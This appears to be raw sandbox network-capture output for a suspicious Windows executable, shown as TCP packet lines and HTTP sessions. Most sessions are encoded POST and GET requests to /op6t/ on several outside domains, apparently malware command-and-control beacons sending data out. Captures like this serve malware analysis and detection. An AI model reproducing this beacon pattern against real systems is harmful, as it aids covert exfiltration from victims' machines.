                                                                        May 22, 2024 17:36:33.050585985 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.050637960 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.050733089 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.050852060 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.051049948 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.051063061 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.051235914 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.051392078 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.051443100 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.051632881 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.051657915 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.051763058 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.051886082 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.052052975 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.052109003 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.052272081 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.052336931 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.052495956 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.052577972 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.052757025 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.052808046 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.052978992 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.053004026 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.053128958 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.053220034 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.053453922 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.053467989 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.053641081 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.053697109 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.053747892 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.053881884 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.054106951 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.054120064 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.054246902 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.054348946 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.054477930 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.054542065 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.054860115 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.054909945 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.055071115 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.055109024 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.055197954 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.055286884 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.055505037 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.055629015 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.055670023 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.055773973 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.055864096 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.055942059 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.056237936 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.056288958 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.056449890 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.056554079 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.056652069 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.056747913 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.056885004 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.056930065 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.057190895 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.057241917 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.057365894 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.057419062 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.057617903 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.057702065 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.057813883 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.057876110 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.057921886 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.058099985 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.058301926 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.058315039 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.058408022 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.058533907 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.058661938 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.058737993 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.058914900 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.058964968 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.059170008 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.059225082 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.059322119 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.059438944 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.059602022 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.059652090 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.059812069 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.059848070 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.059986115 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.060154915 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.060270071 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.060281992 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.060532093 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.060636997 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.060648918 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.060777903 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.060973883 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.061028957 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.061160088 CEST4985380192.168.11.3037.140.192.90
Session ID: 0
Source IP: 192.168.11.30
Source Port: 49796
Destination IP: 91.195.240.123
Destination Port: 80
PID: 7248
Process: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe

Timestamp: May 22, 2024 17:31:12.283785105 CEST
Bytes transferred: 481
Direction: OUT
Data:
GET /op6t/?x2=wN2xY&nvddg=joKdiSi7KJbAbr0hs6/zjIJE4Behm4Eg2djH6+j8Qf7psFFLI9x7hyvntQ/EnvkMSFoG+HsqaOuOcF82SsMnr5xrxJqptXsvFzFrqoI6sGt4i0+JY4UwfJo= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.l7aeh.us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36

Timestamp: May 22, 2024 17:31:12.607872009 CEST
Bytes transferred: 208
Direction: IN
Data:
HTTP/1.1 403 Forbidden
                                                                        content-length: 93
                                                                        cache-control: no-cache
                                                                        content-type: text/html
                                                                        connection: close
                                                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID: 1
Source IP: 192.168.11.30
Source Port: 49797
Destination IP: 139.162.5.234
Destination Port: 80
PID: 7248
Process: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe

Timestamp: May 22, 2024 17:31:28.207674980 CEST
Bytes transferred: 771
Direction: OUT
Data:
POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.tycent520test.com
                                                                        Origin: http://www.tycent520test.com
                                                                        Referer: http://www.tycent520test.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=z4yy+rh/POA0h0IHcWGt/x0BHIW/+T4TkYb2MeNbMyQt6D8PzxWgY6m6M/HLaaQBBbfyPaRHXcAdIq7qeD7ybTi/RRph7BJJ8IWKflR5QVcYnwOM2KbhjmvjyZsoG1xELPNlZsSy74N5WvmcJd4Mu+DXwi91prnycH4DrUk/vslm/BANb+Ee34RyR0QsSqX2FQ==


Session ID: 2
Source IP: 192.168.11.30
Source Port: 49798
Destination IP: 139.162.5.234
Destination Port: 80
PID: 7248
Process: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe

Timestamp: May 22, 2024 17:31:31.097387075 CEST
Bytes transferred: 791
Direction: OUT
Data:
POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.tycent520test.com
                                                                        Origin: http://www.tycent520test.com
                                                                        Referer: http://www.tycent520test.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=z4yy+rh/POA0nlYHfxytuR0AZ4W/0z5UkYn2MfJ1MBkt6mAPhj+gf6m6ZPHKHKQeBbDAPatHXcUdIoTqfy7xaDi9ZxpjjhJJ8IWKfl0uQRIYnA+M2v23pGvgipsoC1xALPNDZpz67715WtucIM4Pl+DR0i9m6+S1H0FwgD4hiNdz+WxXG9wckYtfN19EQoWtYb47UCwrRXBzrWqAJ01jocY=


                                                                        Session ID: 3 | Source IP: 192.168.11.30 | Source Port: 49799 | Destination IP: 139.162.5.234 | Destination Port: 80 | PID: 7248 | Process: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp: May 22, 2024 17:31:33.998828888 CEST | Bytes transferred: 1708 | Direction: OUT | Data:
                                                                        POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.tycent520test.com
                                                                        Origin: http://www.tycent520test.com
                                                                        Referer: http://www.tycent520test.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                                                                        Session ID: 4 | Source IP: 192.168.11.30 | Source Port: 49800 | Destination IP: 139.162.5.234 | Destination Port: 80 | PID: 7248 | Process: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp: May 22, 2024 17:31:36.884895086 CEST | Bytes transferred: 490 | Direction: OUT | Data:
                                                                        GET /op6t/?nvddg=+6aS9fJbP9c9g0cefBC2hCdSY6eI42Bs0771KfpwNwRwjCkC9gP/ScKef//fPL1ZRbSBI6tgf+IRGYWXfXrYWSfcXSoVwh43zp6ZVipPdxItsiOM6ZnovEU=&x2=wN2xY HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.tycent520test.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Timestamp: May 22, 2024 17:31:39.424586058 CEST | Bytes transferred: 562 | Direction: IN | Data:
                                                                        HTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:31:39 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding, Cookie
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        X-Redirect-By: WordPress
                                                                        Location: http://tycent520test.com/op6t/?nvddg=+6aS9fJbP9c9g0cefBC2hCdSY6eI42Bs0771KfpwNwRwjCkC9gP/ScKef//fPL1ZRbSBI6tgf+IRGYWXfXrYWSfcXSoVwh43zp6ZVipPdxItsiOM6ZnovEU=&x2=wN2xY
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Data Raw: 36 0d 0a ef bb bf ef bb bf 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 60


                                                                        Session ID: 5 | Source IP: 192.168.11.30 | Source Port: 49801 | Destination IP: 34.149.87.45 | Destination Port: 80 | PID: 7248 | Process: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp: May 22, 2024 17:31:53.173985004 CEST | Bytes transferred: 786 | Direction: OUT | Data:
                                                                        POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.century21morenoycia.mx
                                                                        Origin: http://www.century21morenoycia.mx
                                                                        Referer: http://www.century21morenoycia.mx/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=4VRXfYRLCIXgoqLvP4248fGlow1lwzb3PamZJjVTmYhSUGJynMiUh6iWqRywq37Oh6py0gfiPwtggiDbNjozi9OUPhaq12NtdOC8dATI9QrD8U5EB+WoFOZCiRb0CyBQYlCrhZwy9FjfLM2wCY89QBI5yKNtlX/o9PQiDo/LVfk3BXpM8v7eaa1mhCdaZjIkIg==
                                                                        Timestamp: May 22, 2024 17:31:53.393793106 CEST | Bytes transferred: 1078 | Direction: IN | Data:
                                                                        HTTP/1.1 403 Forbidden
                                                                        Content-Length: 548
                                                                        Content-Type: text/html
                                                                        Server: Pepyaka
                                                                        X-Wix-Request-Id: 1716391913.2879038353616611341
                                                                        X-Content-Type-Options: nosniff
                                                                        Accept-Ranges: bytes
                                                                        Date: Wed, 22 May 2024 15:31:53 GMT
                                                                        X-Served-By: cache-bfi-krnt7300043-BFI
                                                                        X-Cache: MISS
                                                                        X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLrS/q53T25jsaPnfPkSVOt8m++C2XkuTvnlRFg2XiSDL
                                                                        Via: 1.1 google
                                                                        glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session ID: 6 | Source IP: 192.168.11.30 | Source Port: 49802 | Destination IP: 34.149.87.45 | Destination Port: 80 | PID: 7248 | Process: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp: May 22, 2024 17:31:55.882236004 CEST | Bytes transferred: 806 | Direction: OUT | Data:
                                                                        POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.century21morenoycia.mx
                                                                        Origin: http://www.century21morenoycia.mx
                                                                        Referer: http://www.century21morenoycia.mx/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=4VRXfYRLCIXgpKbvOZ247/GmnQ1l+TbzPaqZJm0OmrVSVkRygOaUg6iWhxy1u37/h6160kXiPwpggizbNww8jtOWaRa0x2NtdOC8dAHu9QTD9lpEO7ira+ZFjRb0VCBcYlCFhbEU9DnfLNGwCp8iLRI//qMF2UKC9d5XNvDkTOogJgYWhsPcJ6JL9DwybhJ/VkGk81H8hzRUNxfMO7CBino=
                                                                        Timestamp: May 22, 2024 17:31:56.098582029 CEST | Bytes transferred: 1078 | Direction: IN | Data:
                                                                        HTTP/1.1 403 Forbidden
                                                                        Content-Length: 548
                                                                        Content-Type: text/html
                                                                        Server: Pepyaka
                                                                        X-Wix-Request-Id: 1716391915.9949035481464927455
                                                                        X-Content-Type-Options: nosniff
                                                                        Accept-Ranges: bytes
                                                                        Date: Wed, 22 May 2024 15:31:55 GMT
                                                                        X-Served-By: cache-bfi-krnt7300056-BFI
                                                                        X-Cache: MISS
                                                                        X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLpLkXwApeozbAp9OYhJGBzcG/hKs8AeY1T4OIbgnD+yx
                                                                        Via: 1.1 google
                                                                        glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session ID: 7 | Source IP: 192.168.11.30 | Source Port: 49803 | Destination IP: 34.149.87.45 | Destination Port: 80 | PID: 7248 | Process: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp: May 22, 2024 17:31:58.585235119 CEST | Bytes transferred: 1723 | Direction: OUT | Data:
                                                                        POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.century21morenoycia.mx
                                                                        Origin: http://www.century21morenoycia.mx
                                                                        Referer: http://www.century21morenoycia.mx/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Timestamp: May 22, 2024 17:31:58.802642107 CEST | Bytes transferred: 1078 | Direction: IN | Data:
                                                                        HTTP/1.1 403 Forbidden
                                                                        Content-Length: 548
                                                                        Content-Type: text/html
                                                                        Server: Pepyaka
                                                                        X-Wix-Request-Id: 1716391918.6989036252325017526
                                                                        X-Content-Type-Options: nosniff
                                                                        Accept-Ranges: bytes
                                                                        Date: Wed, 22 May 2024 15:31:58 GMT
                                                                        X-Served-By: cache-bfi-krnt7300080-BFI
                                                                        X-Cache: MISS
                                                                        X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLquCTNcWTuCgj0HzMr4ZQgwm++C2XkuTvnlRFg2XiSDL
                                                                        Via: 1.1 google
                                                                        glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session ID: 8 | Source IP: 192.168.11.30 | Source Port: 49804 | Destination IP: 34.149.87.45 | Destination Port: 80 | PID: 7248 | Process: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp: May 22, 2024 17:32:01.287664890 CEST | Bytes transferred: 495 | Direction: OUT | Data:
                                                                        GET /op6t/?nvddg=1X53ctdebY/A2eDtJqzL446hhD1I+nvyO5ulDREEvqgJJ1wskdyJ8sishyyYv1KZ95Yv7APwNDtcqTXRSGEguqmEKyboxWEzcfGHGWjx7gGV1XFCOYCNEPY=&x2=wN2xY HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.century21morenoycia.mx
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Timestamp: May 22, 2024 17:32:01.605890989 CEST | Bytes transferred: 1188 | Direction: IN | Data:
                                                                        HTTP/1.1 301 Moved Permanently
                                                                        Content-Length: 0
                                                                        Location: https://www.century21morenoycia.mx/op6t?nvddg=1X53ctdebY%2FA2eDtJqzL446hhD1I+nvyO5ulDREEvqgJJ1wskdyJ8sishyyYv1KZ95Yv7APwNDtcqTXRSGEguqmEKyboxWEzcfGHGWjx7gGV1XFCOYCNEPY%3D&x2=wN2xY
                                                                        Strict-Transport-Security: max-age=86400
                                                                        X-Wix-Request-Id: 1716391921.43217953563523127392
                                                                        Age: 0
                                                                        Cache-Control: no-cache
                                                                        Server: Pepyaka
                                                                        X-Content-Type-Options: nosniff
                                                                        Accept-Ranges: bytes
                                                                        Date: Wed, 22 May 2024 15:32:01 GMT
                                                                        X-Served-By: cache-bfi-krnt7300107-BFI
                                                                        X-Cache: MISS
                                                                        Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_g
                                                                        X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLqMQhUjPXFZZ6QMfhZ0ZUmYa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRaltysJ2DS6T5tlT4+YriOCFNA1mtqXjqeJ6NnIibDmWi+J3BVsW5vufvuxNlBNfOnpw==,2UNV7KOq4oGjA5+PKsX47Dble4mX84gMvMh/QnMYdHsfbJaKSXYQ/lskq2jK6SGP,WjYibKLCpAJr3VaKO1qH9qsELXQ+BXvQ7zCHAw7TWos=,9rSLScDc8xvwnXUS+E/OviP2uMDc1qPS6xWJcM6X4hk=,j1W3GTXLqH1rFP/nP6vn5n3Lq3ezQHSws1kprB2VJS4As3p4zJRwrswGGvG1EhAfNhK9YVRucqBPmZZHe8sdeQ==
                                                                        Via: 1.1 google
                                                                        glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                        Connection: close


                                                                        Session ID: 9 | Source IP: 192.168.11.30 | Source Port: 49805 | Destination IP: 34.174.122.2 | Destination Port: 80 | PID: 7248 | Process: C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp: May 22, 2024 17:32:25.365112066 CEST | Bytes transferred: 780 | Direction: OUT | Data:
                                                                        POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.facesofhoustontx.com
                                                                        Origin: http://www.facesofhoustontx.com
                                                                        Referer: http://www.facesofhoustontx.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=MFggT74RcgGFBbtP9PuBuHtLOyMc2wCWiNeNWqLRoYzcnasRXpEkuZimehnS/rL78GjprdG02nDUl6c7QecaqJqQo64YTyQIUUxTZAGBpmVBqa2sMP6Yjj7vnzuWqiFIap1NihbzvYtc4w+C1F+4jUk7UDUdwQPD9a5aJv1qsPKtGef4ajJG9c21qUEfy+xc0A==


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
